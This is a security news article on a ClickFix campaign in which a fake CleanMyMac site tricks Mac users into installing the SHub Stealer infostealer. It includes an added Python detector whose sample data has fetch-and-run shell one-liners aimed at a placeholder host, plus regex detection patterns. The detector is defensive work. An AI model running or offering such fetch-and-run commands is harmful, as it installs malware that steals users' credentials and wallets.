Security researchers at Malwarebytes have identified a malware campaign targeting macOS users through a fraudulent website that impersonates the popular CleanMyMac system utility. The operation distributes an information-stealing malware designed to collect passwords, cryptocurrency wallet data, and other sensitive information from infected devices.

The malicious campaign relies on a fake website that closely imitates the legitimate CleanMyMac product page. CleanMyMac is a macOS maintenance and optimization tool developed by MacPaw and used by millions of Mac users to manage storage and system performance. The attackers’ site presents itself as a download portal for the software, but is not connected to MacPaw or the official CleanMyMac application.

According to security researchers, the fake page directs visitors to a domain designed to resemble the legitimate site. Victims are instructed to open the Terminal application on their Mac and paste a command provided on the page. Executing the command downloads and installs malware directly from an attacker-controlled server.

The technique used in the attack is known as “ClickFix,” a social engineering method that persuades users to run malicious commands themselves. Because the command is executed voluntarily by the user, many of macOS’s built-in protections, such as Gatekeeper, notarization checks, and XProtect, do not block the installation.

Once executed, the command installs SHub Stealer, a macOS information-stealing malware. The malware is designed to collect sensitive data from the compromised system, including browser data, saved passwords, Apple Keychain information, cryptocurrency wallet files, and messaging platform sessions such as Telegram.

Researchers also observed that the malware attempts to modify certain cryptocurrency wallet applications so attackers can later access recovery phrases or other authentication information. Wallet applications potentially targeted include Exodus, Atomic Wallet, and Ledger-related software.

The attack sequence begins with a small loader script that prepares the system before the full payload is delivered. In some cases, the script checks system settings to determine the device’s location or language configuration before continuing with the infection process.
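As an added illustration that is not part of the Malwarebytes report, the following Python checker flags ClickFix-style "paste this into Terminal" one-liners in shell history or command-line telemetry, which is where the install step described above would leave a trace. The sample lines and the example.invalid host are constructed, and the `defaults read -g AppleLocale` probe is an assumption about how a loader might read the language settings the article mentions, not a detail taken from the campaign.

```python
import re

# Constructed sample command lines (not taken from the campaign or the report).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/install.sh | bash",
    "echo 'Y3VybCBodHRw' | base64 -d | sh",
    "brew install wget",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/cleanmymac)"',
    "defaults read -g AppleLocale",
]

# Shapes that a "paste this into Terminal" lure typically takes, plus a
# locale probe of the kind the article says some loaders perform (assumed form).
PATTERNS = {
    "remote_pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|-D|--decode)[^|]*\|\s*(ba|z)?sh\b"),
    "command_substitution_fetch": re.compile(r"(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"),
    "locale_probe": re.compile(r"defaults\s+read\s+(-g|NSGlobalDomain)\s+AppleLocale\b"),
}

# Only the first three are strong on their own; the locale probe is context.
STRONG = {"remote_pipe_to_shell", "base64_decode_to_shell", "command_substitution_fetch"}


def classify(line: str) -> list[str]:
    """Return the names of every pattern the command line matches."""
    return [name for name, rx in PATTERNS.items() if rx.search(line)]


def scan(lines: list[str]) -> list[dict]:
    """Return one finding per matching line, with a severity for triage."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = classify(line)
        if not hits:
            continue
        severity = "high" if STRONG & set(hits) else "low"
        findings.append({"line": number, "command": line, "hits": hits, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_HISTORY):
        print(f"[{f['severity']}] line {f['line']}: {f['command']} -> {', '.join(f['hits'])}")
```

Feeding it `~/.zsh_history` or EDR process command-line events would surface the same shapes on a real host; a high-severity hit is worth a look, while a lone locale probe is only context.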

After installation, the malware can remain on the system and continue communicating with attacker-controlled infrastructure. In addition to stealing data, researchers say the malware can leave a persistent backdoor that allows attackers to maintain access even after initial data collection has occurred.

The campaign highlights how attackers increasingly rely on social engineering instead of exploiting technical vulnerabilities. By convincing victims to run commands manually, the malware bypasses many of the automated defenses designed to protect macOS systems.

Security researchers recommend downloading software only from official developer websites or trusted app stores. They also advise users to treat any website that instructs them to paste commands into the Terminal as suspicious, since legitimate applications rarely require this installation method.